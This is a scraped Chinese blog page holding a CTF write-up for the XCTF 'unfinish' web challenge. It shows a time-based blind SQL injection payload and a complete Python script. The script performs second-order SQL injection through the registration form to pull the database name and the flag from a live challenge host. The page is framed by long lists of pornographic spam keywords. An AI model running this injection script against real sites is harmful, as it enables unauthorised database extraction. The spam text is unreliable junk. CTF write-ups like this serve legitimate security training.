日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

攻防世界-web-unfinish-从0到1的解题历程writeup

發(fā)布時間:2024/9/30 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 攻防世界-web-unfinish-从0到1的解题历程writeup 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

題目分析

題目描述為:SQL

題目主要功能界面分析:

主要分為注冊、登陸、以及成功登陸后的一個界面。

通過描述可以知道題目應(yīng)該存在SQL注入漏洞。

掃描得知注冊界面存在SQL注入漏洞

嘗試構(gòu)造sql盲注語句如下

{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}

得到結(jié)果為

即存在過濾

測試發(fā)現(xiàn)過濾了逗號、information

那么使用盲注應(yīng)該不太行了,但是username這邊的內(nèi)容是可以執(zhí)行,所以我們將username的值拼接上查找出來的內(nèi)容,利用登陸后會顯示用戶名做到一個二次注入的效果。

解題流程

首先可知注冊的sql語句應(yīng)該為

insert into tables values('$email','$username','$password')

我們通過控制post的參數(shù)

構(gòu)造sql語句為:

insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')

即插入的username即拼接上了我們要查找的

查數(shù)據(jù)庫腳本如下

import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())

得到數(shù)據(jù)庫名為web

然后嘗試獲取表名失敗,因為過濾了information

看了評論說表名全靠猜哈哈

還是給上一個獲取flag的腳本

腳本中途獲取表名失敗了,被我注釋了~~emmm

import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database = ''for i in range(10):data_database = {'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin11@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_database)login_data={'password':'admin',"email":"admin11@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakdatabase+=chr(int(username))return databaseprint(getDatabase())def getTables():tables = ''for i in range(10):data_tables = {'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin12@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_tables)login_data={'password':'admin',"email":"admin12@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breaktables+=chr(int(username))return tables ''' print(getTables()) '''def getFlag():flag = ''for i in range(40):data_flag = {'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",'password':'admin',"email":"admin32@admin.com"+str(i)}#注冊requests.post("http://159.138.137.79:52974/register.php",data_flag)login_data={'password':'admin',"email":"admin32@admin.com"+str(i)}response=requests.post("http://159.138.137.79:52974/login.php",login_data)html=response.text #返回的頁面soup=BeautifulSoup(html,'html.parser')getUsername=soup.find_all('span')[0]#獲取用戶名username=getUsername.textif int(username)==0:breakflag+=chr(int(username))return flagprint(getFlag())

總結(jié)

以上是生活随笔為你收集整理的攻防世界-web-unfinish-从0到1的解题历程writeup的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 精品97人妻无码中文永久在线 | 国产精品一二三级 | 久久久久久中文字幕 | 一级免费a | 久久免费福利视频 | 精品人妻一区二区三区久久夜夜嗨 | 亚洲精品水蜜桃 | 二区久久 | 亚洲精品福利在线 | 久久网国产 | 亚洲天堂一区二区 | 国产乱强伦一区二区三区 | jzzijzzij亚洲成熟少妇 | 亚洲国产欧美在线人成 | 国产高清片 | 五月天青青草 | 国产ts系列 | 久久性网 | a级片在线观看视频 | 中文字幕 日韩有码 | 午夜网页 | 国产aa视频 | 草久久免费视频 | 美女被艹视频网站 | 精品无码av一区二区三区四区 | 变态另类丨国产精品 | 蜜桃精品视频在线 | 国产porn | 天天做日日干 | 多毛的亚洲人毛茸茸 | 国产的av| 久久这里有精品视频 | 欧美黄在线观看 | 亚洲自拍偷拍网站 | 伊人亚洲精品 | 精品日韩欧美 | 免费黄色看片网站 | 久久精品99国产精 | 密臀av在线播放 | 91免费在线播放 | 人妻互换 综合 | 伊人激情在线 | 久久精品免费网站 | 国产成人三级在线 | 日本三级韩国三级三级a级中文 | 少妇粉嫩小泬喷水视频www | 99久久婷婷| 少妇三级 | 五十路熟母 | 一区二区三区欧美在线 | 久久人妻少妇嫩草av无码专区 | 亚洲天天综合 | 欧美极品视频在线观看 | 精品人妻一区二区免费 | 亚洲黄在线观看 | 亚洲精品免费在线播放 | aaa特级毛片 | 无码人妻久久一区二区三区蜜桃 | 在线免费观看欧美大片 | 丰满少妇高潮一区二区 | 国产综合视频在线观看 | 国产精品美女久久 | 玖玖久久 | 久久性生活视频 | 自拍偷拍小视频 | 日韩一区在线视频 | 日韩欧美黄色 | 久久视频一区二区三区 | 夜夜操女人 | 全黄一级男人和女人 | 国产爆乳无码一区二区麻豆 | 色葡萄影院 | 久久依人 | 91玖玖| 天堂网avav| 国产第八页 | 亚欧在线播放 | 欧美另类精品 | 成人在线免费播放 | 国产做爰xxxⅹ久久久精华液 | 综合av第一页| m3u8成人免费视频 | 国产免费一区二区三区 | 天天综合人人 | 日韩综合第一页 | 影院一区 | 亚洲av永久无码精品一区二区国产 | 亚洲自拍偷拍网站 | 欧美亚洲在线视频 | 六月婷婷综合网 | 在线免费黄色网址 | 在线亚洲成人 | 中文字幕一二三区 | 无码任你躁久久久久久老妇 | 人人爱国产 | 熟妇人妻系列aⅴ无码专区友真希 | 91丨九色丨丰满 | 免费在线黄色片 | 91免费 看片 |